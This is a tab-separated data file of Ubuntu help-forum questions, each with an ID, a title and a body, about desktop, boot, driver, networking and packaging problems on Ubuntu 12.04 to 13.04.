283370	regenerate resolv.conf from dhclient.conf without releasing/renewing ip ?	when i make changes to dhclient.conf such as modifying the dns search path ( so that the changes do n't get lost on reboot or dhcp renews ) , how do i regenerate /etc/resolv.conf ? that page suggests dhclient -r ; dhclient which releases the address , thus disrupting my connection and preventing me from reaching the host again . is there another way of doing this ? thanks .
283372	how to run a new app that did n't get added to the launcher	i installed a new app ( vmware player , using the answer from another question ) and it did n't get added to the launcher . that is when i realized that without the launcher , i 'm dead-in-the-water . i do n't know where to find the app . i did find help on how to add something to the launcher , but they assumed that one would already know where to find the executable . so , where do the executables reside , and what identifies them as such ? thanks .
283373	a package was installed badly . how to remove it ?	when i 'm trying to update or install anything i get this error : reading package lists ... done building dependency tree reading state information ... done e : the package equalx needs to be reinstalled , but i ca n't find an archive for it . i tried to install equalx_0.51.deb but it failed . i tested some commands like sudo dpkg -- configure -a , but it was not solved .
283379	grub splash options	a clean install of ubuntu 12.10 on a laptop ( from server cd , and then xubuntu-desktop package ) works well . however , during boot there are sometimes text messages : how do i change this so that no text messages scroll during boot ? is that quiet splash in /etc/default/grub and then run sudo update-grub ?
283381	how to back up and trasnfer ubuntu data and application ?	alright , i want to re-install ubuntu , to give it a bigger partition / fix some stuffs and what not . how do i back up all my data , and applications . does anyone know of any simple tutorials ? i 'm not really much of a techie . do i just copy my /home and /ect to the new ubuntu install ? all help is greatly appreciated !
283387	ca n't boot live usb on windows 7 system	i made a usb bootable using a program recommended by the ubuntu website , but when ever i go to the boot menu on restart there is no option to boot from usb . i 've restarted 8 times and still do n't see it .
283391	how can i invoke the soft-keyboard widget on ubuntu-touch ?	if you 're building a qtquick 2.0 app , what is the procedure for specifying that the soft-keyboard should be selectable/expandable at the bottom of the screen ?
283394	why does wget fail with `` 503 service unavailable '' error ?	i 've upgraded from ubuntu 10.04 to 12.04 . now for some files wget keeps on failing with a 503 service unavailable error : $ wget http : //repo.maven.apache.org/maven2/org/mortbay/jetty/maven-jetty-plugin/6.1.14/maven-jetty-plugin-6.1.14.jar -- 2013-04-20 01:28:44 -- http : //repo.maven.apache.org/maven2/org/mortbay/jetty/maven-jetty-plugin/6.1.14/maven-jetty-plugin-6.1.14.jar resolving www-9z.dienste.t-systems.com ( www-9z.dienste.t-systems.com ) ... 10.36.1.55 connecting to www-9z.dienste.t-systems.com ( www-9z.dienste.t-systems.com ) |10.36.1.55|:80 ... connected . proxy request sent , awaiting response ... 503 service unavailable 2013-04-20 01:29:14 error 503 : service unavailable . however , this does n't seem to be a general problem . for instance , wgetting google.com works fine : $ wget http : //www.google.com -- 2013-04-20 01:35:38 -- http : //www.google.com/ resolving www-9z.dienste.t-systems.com ( www-9z.dienste.t-systems.com ) ... 10.36.1.55 connecting to www-9z.dienste.t-systems.com ( www-9z.dienste.t-systems.com ) |10.36.1.55|:80 ... connected . proxy request sent , awaiting response ... 302 found location : http : //www.google.de/ [ following ] -- 2013-04-20 01:35:38 -- http : //www.google.de/ reusing existing connection to www-9z.dienste.t-systems.com:80 . proxy request sent , awaiting response ... 200 ok length : unspecified [ text/html ] saving to : `index.html.2' [ < = > ] 10,882 -- .-k/s in 0.02s 2013-04-20 01:35:38 ( 524 kb/s ) - `index.html.2 ' saved [ 10882 ] any ideas ? solved ! dobey was right - it was a problem with the proxy . i configured a different ( correct ) proxy and everything worked fine ( for wget you can configure this either globally in /etc/wgetrc or individually in ~/.wgetrc with http_proxy = http : //proxyhost : port/ ) . the issue had nothing to do with ubuntu or wget .
283399	chromium-browser starts with unmaximized window	chromium browser by default start with an unmaximized window in my ubuntu system and i 've to manually do maximize . how can i open chromium browser maximized by default ? also , i 've locked the launcher to the side panel .
283404	managing xcp using xenopenmanager	ubuntu server 12.10 64bit . i installed the xen server using the `` apt-get install xcp-xapi '' trying to connect to host using openxenmanager but it keeps on giving me `` [ errno 11 ] connection refused '' . ping & ssh is working . do n't know what could be the problem best regards
283410	ubuntu 12.04 wo n't connect to internet	i 'm a total linux newbie who just installed ubuntu 12.04 . i assumed it would connect to the internet automatically , just like my windows 7 does . ( i do n't have a wireless modem - just a regular wired/cable modem . ) i 've only ever used windows computers , so i 've never had to manually connect to the internet . hence , i have no idea how to do it . any advice ? thanks !
283412	1920x1080 scrolling	this is about to drive me up the wall . after an update last week my ubuntu 12.10 machine has a scrolling screen when i switch it to 1920x1080 ( 16:9 ) . i ca n't seem to find anyone who has the same problem . does anyone have an idea what is going on ?
283415	ubuntu 12.04.2 lts boots to command line of some kind	i recently built a computer , then installed ubuntu 12.04.2 lts ( desktop , amd64 ) using the universal usb installer from pendrivelinux.com . when it was first installed , the unity bar ( at the left ) was flickering a bit , so i installed the amd catalyst 13.1 proprietary driver from the amd website , which stopped the flickering . i then downloaded the following : •java 7 update 21 ( a real pain ) •openjdk runtime environment for java 7 •minecraft •steam after a while , when i tried playing minecraft , it started to go to some kind of command line that was not terminal ( can not input ) before going to the login screen . after this , it asked me to install the amd fglrx driver updates and after a reboot , it started going to the same command line-type-non-terminal thing i explained earlier . does anyone know why this is happening and how i can fix it ? i am a noob when it comes to the deeper parts of linux , i only know things like apt-get ( which will not work here ) . specs amd a6-5400k 4gb ram 60gb ssd msi fm2-a55m-e33 motherboard
283416	why is ubuntu 's webkit missing a few things ?	i 'm using a webkit browser with python+gtk , and it seems to be missing a few things . you can see the problem in the example from here : from gi.repository import webkit from gi.repository import gtk import os # the activate_inspector function gets called when the user # activates the inspector . the splitter is a gtk.splitter and is user # data that i passed in when i connected the signals below . # the important work to be done is to create a new webview # and return it in the function . webkit will use this new view # for displaying the inspector . along the way , we need to add # the view to the splitter def activate_inspector ( inspector , target_view , splitter ) : inspector_view = webkit.webview ( ) splitter.add2 ( inspector_view ) return inspector_view # create the container widgets window = gtk.window ( ) window.set_size_request ( 400,300 ) window.connect ( `` destroy '' , gtk.main_quit ) splitter = gtk.paned ( orientation=gtk.orientation.vertical ) window.add ( splitter ) # create the webview view = webkit.webview ( ) # use set_property to turn on enable-developer-extras . this will # cause `` inspect element '' to be added to the webkit 's context menu . # do not use view.get_settings ( ) .enable_developer_extras = true , # this does not work . only using `` set_property '' works . view.get_settings ( ) .set_property ( `` enable-developer-extras '' , true ) # get the inspector and wire the activate_inspector function . # pass the splitter as user data so the callback function has # a place to add the inspector to the gui . inspector = view.get_inspector ( ) inspector.connect ( `` inspect-web-view '' , activate_inspector , splitter ) # make a scroller pane to host the main webview sw = gtk.scrolledwindow ( ) sw.add ( view ) splitter.add1 ( sw ) # put something in the webview html_string = `` < html > < head > < /head > < body > hello world < /body > < /html > '' root_web_dir = os.path.dirname ( os.path.dirname ( __file__ ) ) root_web_dir = `` file : // % s/ '' % root_web_dir view.load_html_string ( html_string , root_web_dir ) # show the window and run the program window.show_all ( ) gtk.main ( ) when you open the inspector , then open the console , the breadcrumb/resizer does n't show . i described the problem in detail on this post , which has had no answers , and i reported a bug , which has had no response . so am i correct in assuming this is only a problem on my machine since upgrading 12.10+ ? if so , can i reset/reinstall some packages to make it work properly again ?
283419	ubuntu update gone wrong	i tried to update to 12.10 , but in the mist of installing , the entire computer froze , and not knowing about reisub i forced quit my computer ever since , every time i updated , i was given a message that said to do a partial install ( which i ignored . and a dialog box that said to run a command to fix the software updater . i would update the software , and halfway though installation , the computer would freeze , again i repeated this thinking that next time this would n't happen , but after i rebooted , the desktop seemed broken , appearing only as a back screen that would act like an old frozen windows xp computer ( in that when you move a application around the screen , it 'paints ' a picture of the application on the desktop ) i tried again , it froze , and i reisub i tried again , it froze , and i reisub now , i 'm at a blue screen of death . the entire screen is blue . but all of the processes still work , i just cant get to them without a keyboard shortcut . so how do i fix this disastrous mess ? oh , one more thing , it seems like the system is in this weird state where half of it is in 12.04 and half of its in 12.10 , ever since the first try at updating failed . the login screen says that i 'm in 12.04 , but the ctrl-alt-f1 terminal says i 'm in 12.10
283423	how to tell what is logging bandwidth	i 've been having everything that goes through my nic logged and i 'm not sure how it happened . the last thing i installed was webmin and i 'm not sure if that changed a setting or not but as of today there are gigabytes of data that just started being logged . here is is snippet : apr 19 21:10:57 ubuntu kernel : [ 822924.492326 ] bandwidth_in : in=eth0 out= mac=20 : cf:30:36:68 : d0:60:36 : dd:73:4a:2e:08:00 src=xxx.xxx.x.x dst=xxx.xxx.x.x len=52 tos=0x00 prec=0x00 ttl=64 id=20051 df proto=tcp spt=39080 dpt=22 window=6158 res=0x00 ack urgp=0 apr 19 21:10:57 ubuntu kernel : [ 822924.493889 ] bandwidth_in : in=eth0 out= mac=20 : cf:30:36:68 : d0:60:36 : dd:73:4a:2e:08:00 src=xxx.xxx.x.x dst=xxx.xxx.x.x len=52 tos=0x00 prec=0x00 ttl=64 id=20052 df proto=tcp spt=39080 dpt=22 window=6158 res=0x00 ack urgp=0 apr 19 21:10:57 ubuntu kernel : [ 822924.495514 ] bandwidth_in : in=eth0 out= mac=20 : cf:30:36:68 : d0:60:36 : dd:73:4a:2e:08:00 src=xxx.xxx.x.x dst=xxx.xxx.x.x len=52 tos=0x00 prec=0x00 ttl=64 id=20053 df proto=tcp spt=39080 dpt=22 window=6158 res=0x00 ack urgp=0 apr 19 21:10:57 ubuntu kernel : [ 822924.497028 ] bandwidth_in : in=eth0 out= mac=20 : cf:30:36:68 : d0:60:36 : dd:73:4a:2e:08:00 src=xxx.xxx.x.x dst=xxx.xxx.x.x len=52 tos=0x00 prec=0x00 ttl=64 id=20054 df proto=tcp spt=39080 dpt=22 window=6158 res=0x00 ack urgp=0 apr 19 21:10:57 ubuntu kernel : [ 822924.498597 ] bandwidth_in : in=eth0 out= mac=20 : cf:30:36:68 : d0:60:36 : dd:73:4a:2e:08:00 src=xxx.xxx.x.x dst=xxx.xxx.x.x len=52 tos=0x00 prec=0x00 ttl=64 id=20055 df proto=tcp spt=39080 dpt=22 window=6158 res=0x00 ack urgp=0 apr 19 21:10:58 ubuntu kernel : [ 822925.357381 ] bandwidth_in : in=eth0 out= mac=20 : cf:30:36:68 : d0:60:36 : dd:73:4a:2e:08:00 src=xxx.xxx.x.x dst=xxx.xxx.x.x len=100 tos=0x00 prec=0x00 ttl=64 id=20056 df proto=tcp spt=39080 dpt=22 window=6158 res=0x00 ack psh urgp=0 apr 19 21:10:58 ubuntu kernel : [ 822925.396046 ] bandwidth_out : in= out=eth0 src=xxx.xxx.x.x dst=xxx.xxx.x.x len=52 tos=0x10 prec=0x00 ttl=64 id=4179 df proto=tcp spt=22 dpt=39080 window=249 res=0x00 ack urgp=0 and it is lines and lines of this . how do i find out what is causing this ?
283433	while installing rhytmbox , i get the following error	the following packages have unmet dependencies : gstreamer0.10-ffmpeg : depends : libavcodec-extra-53 ( > = 4:0.7.3-1 ) but 4:0.8.6ubuntu0.12.04.1 is to be installed depends : libavformat-extra-53 ( > = 4:0.7.3-1 ) but 4:0.8.6ubuntu0.12.04.1 is to be installed depends : libavutil-extra-51 ( > = 4:0.7.3-1 ) but 4:0.8.6ubuntu0.12.04.1 is to be installed depends : libc6 ( > = 2.7 ) but 2.15-0ubuntu10.4 is to be installed depends : libglib2.0-0 ( > = 2.31.2 ) but 2.32.4-0ubuntu1 is to be installed depends : libgstreamer-plugins-base0.10-0 ( > = 0.10.31 ) but 0.10.36-1ubuntu0.1 is to be installed depends : libgstreamer0.10-0 ( > = 0.10.31 ) but 0.10.36-1ubuntu1 is to be installed depends : liborc-0.4-0 ( > = 1:0.4.16 ) but 1:0.4.16-1ubuntu2 is to be installed depends : libpostproc-extra-52 ( > = 4:0.7.3-1 ) but 4:0.8.6ubuntu0.12.04.1 is to be installed depends : libswscale-extra-2 ( > = 4:0.7.3-1 ) but 4:0.8.6ubuntu0.12.04.1 is to be installed gstreamer0.10-ffmpeg : i386 : depends : libavcodec-extra-53 ( > = 4:0.7.3-1 ) but 4:0.8.6ubuntu0.12.04.1 is to be installed depends : libavformat-extra-53 ( > = 4:0.7.3-1 ) but 4:0.8.6ubuntu0.12.04.1 is to be installed depends : libavutil-extra-51 ( > = 4:0.7.3-1 ) but 4:0.8.6ubuntu0.12.04.1 is to be installed depends : libc6 ( > = 2.7 ) but 2.15-0ubuntu10.4 is to be installed depends : libglib2.0-0 ( > = 2.31.2 ) but 2.32.4-0ubuntu1 is to be installed depends : libgstreamer-plugins-base0.10-0 ( > = 0.10.31 ) but 0.10.36-1ubuntu0.1 is to be installed depends : libgstreamer0.10-0 ( > = 0.10.31 ) but 0.10.36-1ubuntu1 is to be installed depends : liborc-0.4-0 ( > = 1:0.4.16 ) but 1:0.4.16-1ubuntu2 is to be installed depends : libpostproc-extra-52 ( > = 4:0.7.3-1 ) but 4:0.8.6ubuntu0.12.04.1 is to be installed depends : libswscale-extra-2 ( > = 4:0.7.3-1 ) but 4:0.8.6ubuntu0.12.04.1 is to be installed
283439	how do you add a home button and tabs to custom written web browser in ubuntu	how do you code in a home button for a web browser ? im creating a web browser in ubuntu for use in ubuntu . i am using a mix of glade , python , quickly , webkit and webview i have got nearly everything done and thought a home button would be a nice touch . i already have the home button in place just need to know how to get it to work . for the tabbed buttons i have done this : self.webview = webkit.webview ( ) self.scrolledwindow1.add ( self , webview ) self.scrolledwindow2.add ( self , webview ) self.scrolledwindow3.add ( self , webview ) self.webview.show ( ) the way i have set that tabbed windows and the scrolledwindow out in glade is like this : tab1 holds scrolledwindow1 tab2 holds scrolledwindow2 tab3 holds scrolledwindow3 when i do `` quickly run '' i get this error message : /usr/lib/python2.7/dist-packages/gi/overrides/gtk.py:391 : warning : g_object_set_property : construct property `` type '' for object `window ' ca n't be set after construction gtk.window.init ( self , type=type , **kwds ) traceback ( most recent call last ) : file `` bin/dm-test '' , line 33 , in dm_test.main ( ) file `` /home/matty/dm-test/dm_test/init.py '' , line 33 , in main window = dmtestwindow.dmtestwindow ( ) file `` /home/matty/dm-test/dm_test_lib/window.py '' , line 35 , in new new_object.finish_initializing ( builder ) file `` /home/matty/dm-test/dm_test/dmtestwindow.py '' , line 55 , in finish_initializing self.scrolledwindow1.add ( self , webview ) attributeerror : 'dmtestwindow ' object has no attribute 'scrolledwindow1' now im not sure if im actually calling the tab 's and the scrolledwindow in the right way or not . below is the full code that i have written for this to work ( was working before tabbed window idea ) # code for other initialization actions should be added here . # this builds the tool back and all the buttons ( defines ) self.toolbar = self.builder.get_object ( `` toolbar '' ) self.backbutton = self.builder.get_object ( `` backbutton '' ) self.forwardbutton = self.builder.get_object ( `` forwardbutton '' ) self.refreshbutton = self.builder.get_object ( `` refreshbutton '' ) self.stopbutton = self.builder.get_object ( `` stopbutton '' ) self.homebutton = self.builder.get_object ( `` homebutton '' ) self.urlentry = self.builder.get_object ( `` urlentry '' ) self.webview = webkit.webview ( ) self.scrolledwindow1.add ( self , webview ) self.scrolledwindow2.add ( self , webview ) self.scrolledwindow3.add ( self , webview ) self.webview.show ( ) # this sets the buttons in tool bar to work def on_backbutton_clicked ( self , widget ) : self.webview.go_back ( ) def on_forwardbutton_clicked ( self , widget ) : self.webview.go_forward ( ) def on_refreshbutton_clicked ( self , widget ) : self.webview.reload ( ) def on_stopbutton_clicked ( self , widget ) : self.webview.stop_loading ( ) def on_homebutton_clicked ( self , widget ) : self.webview.open ( default_url ) def on_url_entry_activate ( self , widget ) : url = widget.get_text ( ) self.webview.open ( `` http : // '' + url ) print url has anyone got any ideas how i can properly set the tabbed windows ( want it to look abit like chromium ) the code to set it would also be helpful or a sample of the code i would need to use and a explanation on how to use it if possible . many thanks in advance
283441	unity not loading on 13.04 with nvidia-current	the desktop environment loads ( i can use ctrl+alt+t , for example ) but neither the topbar nor the unity launcher appear on the desktop . dmesg | grep nvidia [ 2.592879 ] nvrm : loading nvidia unix x86_64 kernel module 304.88 wed mar 27 14:26:46 pdt 2013 [ 3.262291 ] nvrm : your system is not currently configured to drive a vga console [ 3.262293 ] nvrm : on the primary vga device . the nvidia linux graphics driver [ 3.262295 ] nvrm : requires the use of a text-mode vga console . use of other console [ 3.262295 ] nvrm : drivers including , but not limited to , vesafb , may result in [ 3.262296 ] nvrm : corruption and stability problems , and is not supported . sudo cat /var/log/syslog | grep nvi apr 19 23:31:35 monster kernel : [ 2.149532 ] nvidia : module license 'nvidia ' taints kernel . apr 19 23:31:35 monster kernel : [ 2.592879 ] nvrm : loading nvidia unix x86_64 kernel module 304.88 wed mar 27 14:26:46 pdt 2013 apr 19 23:31:36 monster kernel : [ 3.262293 ] nvrm : on the primary vga device . the nvidia linux graphics driver tried this , http : //askubuntu.com/a/215020 . not sure where to go from here .
283448	triple booting - windows , ubuntu , and ubuntu studio	i 've windows and ubuntu , and wanted ubuntu studio , so i downloaded ubuntu studio 12.04 dvd file , and i wanted to have triple-booting on my laptop . here is the snapshot of disk management . image link i have installed ubuntu using wubi.exe what should i do to installing ubuntu studio safely ?
283452	simple file server	i want to build a simple ubuntu server for sharing the common shared directory to windows host . and i could map those shared directory to windows machine using simple script . no of users accessing the ubuntu share folder will be 50+ not more than 75 . do n't want to install samba or other application that needs special configuration . just vanila os of ubuntu 12.10 / 12.04 server . please guide me , is their simple way than samba , or should i stick with windows if their is no way in ubuntu . servier side . it should be as simple as right click , share , permit access rights to user , done . - client side . net use x : \ubuntu.local\commondata password /user : user
283453	no dual boot option , no boot priority order	i installed ubuntu yesterday . i partitioned my c : when it was asked to give memory allocation to ubuntu . the version is 12.04 . i was able to install ubuntu completely : ubuntu is successfully installed . restart you computer . i restarted and there was no ubuntu option . windows 7 also asked for a boot repair . so i did that too . i then wanted to change my boot priority order to ubuntu but could n't find it in bios section . i allotted 20gb to ubuntu and it is deducted from c : but i could n't see the partitioned drive in windows 7 . wubi was working fine before on pc with dual boot option . i used linux live key creator to boot my pc through pen drive .
283455	how to build high througout put file server in ubuntu like nas or windows storage server	is it possible to build nas server with ubuntu without samba . should have configuration option via browser .
283457	minecraft server in ubuntu 12.10	i 've been living in a hotel do to a house fire . i have just tried to setup a server for some of my friends to connect and it doens't seem to work . i port forwarded the port 27015 and set that in the server.properties file . i also set my ip ( 192.168.2.104 ) in that same file . everything should checkout ok but it doens't , i go to a site like http : //www.canyouseeme.org and it says `` error : i could not see your service on 66.192.111.230 on port ( 27015 ) '' yes my server is running . can you help me ? pc specs : intel core i5 3470 quad 3.2ghz 4gbs ddr3 ram ati radeon hd 5450 1gb ddr3
283460	eclipse + pydev autocomplete	problem : - autocomplete for python not working in eclipse + pydev . platform : - os is lubuntu ; eclipse version : 4.2.2 ; pydev for eclipse 2.7.3.2013031601 i have configured the pythonpath in `` window- > preferences- > pydev- > interpreter-python '' . under this dialog , in the section called `` system pythonpath '' i clicked on the right-hand button labeled `` new folder '' and added the folder `` /var/libs/python-support '' . clicked 'apply ' , restarted eclipse . but still python auto completion does n't work ( ctrl+space ) . any suggestion ? thanks , vineet screenshot of preferences in eclipse
283463	dlink dwa -111 usb wifi card on ubuntu 12.10 in vmware workstation	i am trying to make my dlink dwa-111 work on ubuntu 12.10 in vmware workstation . since vmware does n't recognize my integrated wifi card as a wifi card , i changed to a usb one . this one is recognized in windows 8 , but when i launch my ubuntu vm , it does n't work at all . i 'm still getting connected . disabling the usbb from the host and activating it on the vm : lsusb shows me the dlink usb card > lsmod show me the rt73 module > iwconfig , ifconfig , iwlist shows nothing . i tried many solutions found on google and forums as compiling drivers , getting ndiswrapper , ndisgtk . ndiswrapper -l shows me my driver with the id of the device but when i enter sudo modprobe ndiswrapper i got : fatal : module ndiswrapper not found . and still no wifi on my ubuntu . any assistance will be greatly appreciated .
283465	installing ubuntu with preloaded windows 7	i am trying to install ubuntu as a dual boot with my preloaded windows 7 . i have a 1 tb hard disk . primary partition for windows is limited at 80gb and the rest of the space was unallocated and i booted from the ubuntu cd . according to one of the tutorial i created a 2gb swap space and allocated 50gb as primary ext4 partition and installed ubuntu . now when i boot the pc and try to load into windows i get the following error i googled and found that its the boot loader error on the grub2 . but i am not sure how i can fix the error after trying out a few ways as described in these forums hence am posting a question here . update 1 i booted into a windows 7 live cd and went to the command prompt and ran the following two commands bootrec.exe /fixboot bootrec.exe /fixmbr now the pc boots directly into windows and doesnt allow me to boot into ubuntu : p any idea now how to recover my linux installation ? update 2 i booted into ubuntu live and installed boot-repair and tried to run it . but even after 1 hour it keeps saying scanning and doesnt go forward as suggested by many forums .
283466	how can i set ctrl+shift+w to open an internet browser ?	small question here . i try to set ctrl+shift+w to open an internet browser . every time i add it to the keyboard shortcuts in the settings , it takes back a level in the settings menu rather than accepting my new shortcut . any ideas ?
283470	how do i reduce the size of the menu bar ?	i am trying to make a slim-looking radiance theme . i dont want to switch to linuxmint for slim interfaces , and i like the unity interface more . i have been able to reduce padding from almost all the file in theme-name/gtk-3/*.css and metacity-1/metacity-theme-1.xml . i am still not able to find any place/setting where i can reduce the size of the menu bar . i would like to make it thin . say 3px or 4px thin . you can see in the below shown picture i have been able to slim the size of windows border , and also a little bit for the toolbar ( although i would like to reduce it more ) . the menu bar is still thick and big . please suggest what shall i do , to make it slim ? my theme files . metacity-theme-1.xml gtk-widgets-backdrop.css gtk-widgets.css gtk.css
283481	dual-booting windows 8 and ubuntu studio	i have experience failed to boot system after installing ubuntu , and i wo n't that happens again . i wanted to install ( again ) ubuntu , but this time ubuntu studio . so i just ask a few questions : where i should install grub ( boot loader ) ? at dev\sda or dev\sdax if x refers to root folder partition ? can i regain control to windows bootloader , if grub already installed ? how many gbs recommended to install ubuntu studio ? if my windows ca n't boot , what should i do ? thanks for help .
283486	clementine ca n't add files to ipod classic	ubuntu 12.04 64 bit , clementine 1.01 i 'm unable to add files to my ipod classic 80gb using `` copy to device '' ( or any other method ) . i can play existing music from the ipod through clementine , but unable to add/edit/delete files . i receive the following message : error opening '/media/0a09c861-cfcf-34bf-8908-fd0184a78044/ipod_control/music/f36/libgpod702580.mp3 ' for writing ( read-only file system ) . i suppose this is a permissions issue with the ipod , but i ca n't figure out how to change them . update : $ df filesystem 1k-blocks used available use % mounted on /dev/sda6 30479304 12696156 16234860 44 % / udev 3860960 4 3860956 1 % /dev tmpfs 1548112 960 1547152 1 % /run none 5120 0 5120 0 % /run/lock none 3870276 372 3869904 1 % /run/shm /dev/sdb3 77953984 31709568 46244416 41 % /media/0a09c861-cfcf-34bf-8908-fd0184a78044 $ sudo fdisk -l disk /dev/sda : 256.1 gb , 256060514304 bytes 255 heads , 63 sectors/track , 31130 cylinders , total 500118192 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x4bd72476 device boot start end blocks id system /dev/sda1 * 2048 3074047 1536000 7 hpfs/ntfs/exfat /dev/sda2 3074048 151064575 73995264 7 hpfs/ntfs/exfat /dev/sda3 151066622 483338239 166135809 f w95 ext 'd ( lba ) /dev/sda4 483338240 500115455 8388608 84 os/2 hidden c : drive /dev/sda5 151066624 405514239 127223808 7 hpfs/ntfs/exfat /dev/sda6 405516288 467447807 30965760 83 linux /dev/sda7 467449856 483338239 7944192 82 linux swap / solaris note : sector size is 2048 ( not 512 ) disk /dev/sdb : 80.0 gb , 80026361856 bytes 255 heads , 63 sectors/track , 2432 cylinders , total 39075372 sectors units = sectors of 1 * 2048 = 2048 bytes sector size ( logical/physical ) : 2048 bytes / 2048 bytes i/o size ( minimum/optimal ) : 2048 bytes / 2048 bytes disk identifier : 0x00000000 disk /dev/sdb does n't contain a valid partition table i have tried launching from the terminal and i receive the following message when trying to add music to my ipod : error opening '/media/0a09c861-cfcf-34bf-8908-fd0184a78044/ipod_control/music/f25/libgpod032954.mp3 ' for writing ( read-only file system ) . error opening '/media/0a09c861-cfcf-34bf-8908-fd0184a78044/ipod_control/music/f14/libgpod571815.mp3 ' for writing ( read-only file system ) . error opening '/media/0a09c861-cfcf-34bf-8908-fd0184a78044/ipod_control/music/f12/libgpod515314.mp3 ' for writing ( read-only file system ) . error opening '/media/0a09c861-cfcf-34bf-8908-fd0184a78044/ipod_control/music/f34/libgpod410136.mp3 ' for writing ( read-only file system ) . error opening '/media/0a09c861-cfcf-34bf-8908-fd0184a78044/ipod_control/music/f28/libgpod766970.mp3 ' for writing ( read-only file system ) . error opening '/media/0a09c861-cfcf-34bf-8908-fd0184a78044/ipod_control/music/f26/libgpod559855.mp3 ' for writing ( read-only file system ) . error opening '/media/0a09c861-cfcf-34bf-8908-fd0184a78044/ipod_control/music/f05/libgpod715400.mp3 ' for writing ( read-only file system ) . error opening '/media/0a09c861-cfcf-34bf-8908-fd0184a78044/ipod_control/music/f30/libgpod719592.mp3 ' for writing ( read-only file system ) . error opening '/media/0a09c861-cfcf-34bf-8908-fd0184a78044/ipod_control/music/f17/libgpod508245.mp3 ' for writing ( read-only file system ) . error opening '/media/0a09c861-cfcf-34bf-8908-fd0184a78044/ipod_control/music/f06/libgpod638913.mp3 ' for writing ( read-only file system ) . error opening '/media/0a09c861-cfcf-34bf-8908-fd0184a78044/ipod_control/music/f38/libgpod713671.mp3 ' for writing ( read-only file system ) . error opening '/media/0a09c861-cfcf-34bf-8908-fd0184a78044/ipod_control/music/f32/libgpod255541.mp3 ' for writing ( read-only file system ) . error opening '/media/0a09c861-cfcf-34bf-8908-fd0184a78044/ipod_control/music/f20/libgpod091682.mp3 ' for writing ( read-only file system ) .
283488	what are the choices for the ubuntu desktop gui and how do i enable them ?	i am new to ubuntu and have installed the 12.10 in vm on my laptop . i 've installed the vmware tools as well . however , the vm boots to the command-line . a few questions : what are the choices of desktops in 12.10 ? how does one start and stop all the various desktop gui choices like xdm , kdm , gnome etc ? within the context of the current terminal session that i have open . i want to try them all before making them one of them permanent via a startup init script . i 've tried xdm but other than terminal and nautilus , i ca n't seem to find a menu that will allow me to view and start all the various applications . where do i find the equivalent of windows 'start ' menu in the xdm desktop ( and in other desktops ) ?
283491	my screen turns off	i just download wubi for my laptop and install it . but when i try to load ubuntu in my pc , it just appear a violet screen , later my screen turns off ( but my laptop is still running ) and i hear a little song ( i think is the typicall song when you start session ) . can anyone help me ?
283495	mount luks ext4 usb pen drive in nautilus	i want to mount an encrypted usb pen drive under nautilus , but i get unable to open a folder for 16 gb volume - no application is registered as handling this file . it works if i use the terminal .
283498	taking screenshot saves a black image with the cursor only	whenever i do a screenshot , it saves a black image with the cursor only . however , if i do a screenshot after an app or unity freezes , it would save an image in the state when the app or unity was frozen . i have an ati radeon hd 6290 graphics card which uses the proprietary fglrx experimental beta driver , the other versions of the proprietary drivers ( stable , post-release , firegl ) also do the same . running on ubuntu 12.04.2 .
283503	how can i run evernote on ubuntu ?	i have evernote running on windows . i access the same on my android phone with ease . i want to use the same windows-run evernote to use on my ubuntu , so that the notes fed on windows evernote can be used on this . could anyone suggest me some solution . my knowledge of ubuntu in almost nil .
283511	ubuntu 13.04 causes other pcs internet to be slow ?	i have upgraded to ubuntu 13.04 a few days ago . last night i went to a friend 's house where we were 5 persons total . everyone noticed that the internet was slow - except me . for me it was fast . so we decided to to a little experiment.we started turning off the laptops to see which was causing the trouble . when i turned off mine , the connection speed was restored for the others ! ( no one of us was downloading/uploading/cloud synchronizing anything ) . their laptops had windows , but one of them had ubuntu 12.10 on a partition . so he booted into it , and still his connection was slow . when i disconnected from the lan , it was ok. today another friend came at my house ( running windows ) and we are having the same trouble . when i d/c from the lan it 's ok , when i am online his internet is slow . so that means that it was n't a problem with my friend 's router ( last night ) . i am concluding the my pc is causing the trouble . i even downloaded avg for linux to search for viruses - it did n't find anything . any ideas what might be the cause ? a newly introduced bug ? note : i checked the monitor program and i was n't downloading/uploading anything ( ~1kbps download , ~0 upload )
283513	display not sharp enough on external monitor	i am using ubuntu 12.04 . the display looks sharp enough on my laptop , but when i connect it to my external monitor ( hp 2311x ) it looks slightly blurry . i tried installing intel-linux-graphic-drivers and updated the drivers . still no change . -display:0 description : vga compatible controller product : mobile gm965/gl960 integrated graphics controller ( primary ) vendor : intel corporation physical id : 2 bus info : pci @ 0000:00:02.0 version : 0c width : 64 bits clock : 33mhz capabilities : msi pm vga_controller bus_master cap_list rom configuration : driver=i915 latency=0 resources : irq:44 memory : fc000000-fc0fffff memory : d0000000-dfffffff ioport:1800 ( size=8 ) -display:1 unclaimed description : display controller product : mobile gm965/gl960 integrated graphics controller ( secondary ) vendor : intel corporation physical id : 2.1 bus info : pci @ 0000:00:02.1 version : 0c width : 64 bits clock : 33mhz capabilities : pm bus_master cap_list configuration : latency=0 resources : memory : fc100000-fc1fffff
283516	changing size of windows partition	when i was installing linux , i divided my hdd into few partitions . by mistake , i let for windows too little space . question is , how to uninstall linux , join all partitions and then again divide hdd into few partitions of different size and install linux without uninstalling the windows .
283522	stop gui boot ubuntu arm	i am using an arm version of ubuntu ( lubuntu specifically ) on a pcduino . i want to use it as more of a server as opposed with a monitor . one of the first obvious things to do would be to disable lightdm/x starting on boot . i googled it and everyone is saying you just need to edit /etc/default/grub but grub is not used to boot the arm version and is therefore not installed . any help would be appreciated . thanks
283524	cinnamon settings are not default after installing cinnamon in ubuntu 12.10	i tried out cinnamon ui in ubuntu 12.10 today and found that cinnamon settings were not default ( like when right-clicking desktop > change background , it shows the ubuntu settings window not cinnamon settings ) . so if anyone can help me so that i can use cinnamon in ubuntu at it 's complete potential ?
